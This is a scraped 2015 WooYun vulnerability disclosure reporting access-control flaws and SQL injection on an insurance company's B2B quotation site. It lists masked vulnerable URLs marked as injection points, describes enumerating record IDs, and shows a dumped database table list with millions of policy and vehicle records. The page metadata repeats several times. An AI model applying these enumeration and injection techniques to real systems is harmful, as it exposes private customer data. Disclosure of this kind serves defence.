富邦财险某站多处越权+SQL注入漏洞（可导致百万车主信息泄露）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141718

漏洞标题：富邦财险某站多处越权+SQL注入漏洞（可导致百万车主信息泄露）

漏洞作者：路人甲

提交时间：2015-09-19 11:18

修复时间：2015-11-05 16:28

公开时间：2015-11-05 16:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-19：细节已通知厂商并且等待厂商处理中
2015-09-21：厂商已经确认，细节仅向厂商公开
2015-10-01：细节向核心白帽子及相关领域专家公开
2015-10-11：细节向普通白帽子公开
2015-10-21：细节向实习白帽子公开
2015-11-05：细节向公众公开

简要描述：

能上首页吗

详细说明：

涉及系统：**.**.**.** （B2B系统）

越权+遍历：
第一处：http://**.**.**.**/quotation/common/tb/UINotify3502.jsp?ProposalNo=905012015000001005824
遍历ProposalNo

第二处：
http://**.**.**.**/quotation/common/pg/UIEndorsePtextShow.jsp?BizNo=70507201535060100006301

第三处：
http://**.**.**.**/quotation/CommonViewTrace.do?BusinessNo=70501201535060100584401

SQL注入：
http://**.**.**.**/quotation/CommonViewTrace.do?BusinessNo=70501201535060100584401*
http://**.**.**.**/quotation/common/pg/UIEndorsePtextShow.jsp?BizNo=70507201535060100006301*
http://**.**.**.**/quotation/common/tb/UINotify3502.jsp?ProposalNo=905012015000001005824*
当前库：

Database: QUOTE
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| PRPTPROFITDETAIL        | 69368521 |
| PRPTITEMKIND            | 14811396 |
| PRPTPROFIT              | 6800646 |
| PRPTMAIN                | 3175211 |
| PRPTINSURED             | 2922885 |
| PRPTLIMIT               | 2816130 |
| PRPTENGAGE              | 2105104 |
| PRPTFEE                 | 974295  |
| PRPTITEMCAR             | 974295  |
| PRPTITEMCAREXT          | 974295  |
| PRPTPLAN                | 973107  |
| PRPREQUESTXMLINFO       | 870729  |
| PRPTMAINSUB             | 619316  |
| PRPPROPERTY             | 516184  |
| PRPTINSUREDNATURE       | 498751  |
| PRPTCARSHIPTAX          | 469355  |
| PRPTEXPENSE             | 469355  |
| PRPTTRAFFICRECORD       | 389500  |
| PRPTRENEWAL             | 74299   |
| PRPMAXUSE               | 68418   |
| CIINSUREDEMAND          | 25153   |
| PRPTCARDRIVER           | 8500    |
| PRPTCHARGE              | 4037    |
| PRPPNICKINFO            | 3012    |
| PRPTCARDEVICE           | 798     |
| UTIQTAUWCONDITION       | 487     |
| PRPTCARRATE             | 319     |
| PRPTCARSHIPTAXPREDETAIL | 103     |
| PRPMAXNO                | 91      |
| UTIQTAUWFACTOR          | 88      |
| PRPTAUTOPROFITDETAIL    | 39      |
| PRPTITEMCARMORE         | 21      |
| PRPTCARMODEL            | 4       |
+-------------------------+---------+

千万级别数据
其中PRPTITEMCAR表97万数据

漏洞证明：

修复方案：

权限，过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-09-21 16:26

厂商回复：

CNVD确认所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.按多个风险点评分,rank 16

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141718

漏洞标题：富邦财险某站多处越权+SQL注入漏洞（可导致百万车主信息泄露）

相关厂商：富邦财险

漏洞作者：路人甲

提交时间：2015-09-19 11:18

修复时间：2015-11-05 16:28

公开时间：2015-11-05 16:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141718

漏洞标题：富邦财险某站多处越权+SQL注入漏洞（可导致百万车主信息泄露）

相关厂商：富邦财险

漏洞作者： 路人甲

提交时间：2015-09-19 11:18

修复时间：2015-11-05 16:28

公开时间：2015-11-05 16:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0141718"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云